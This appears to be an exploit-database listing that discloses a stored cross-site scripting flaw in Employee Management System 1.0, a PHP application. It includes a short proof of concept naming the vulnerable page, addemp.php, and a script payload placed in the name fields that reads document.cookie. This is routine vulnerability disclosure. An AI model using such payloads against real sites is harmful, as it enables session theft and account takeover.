Employee management system 1.0 cross site scripting (stored) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-10-16 |
Type : webapps |
Platform : php
This exploit / vulnerability Employee management system 1.0 cross site scripting (stored) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#Exploit Title: Employee Management System 1.0 - Stored Cross Site Scripting
#Date: 2020-10-16
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
#Version: 1.0
#Tested on: Windows 10 + xampp v3.2.4
Proof of Concept:::
Step 1: Open the URL localhost:8081/Employee Management System/addemp.php
Step 2: Use payload <img src=x onerror=alert(document.cookie)> in First Name and Last Name.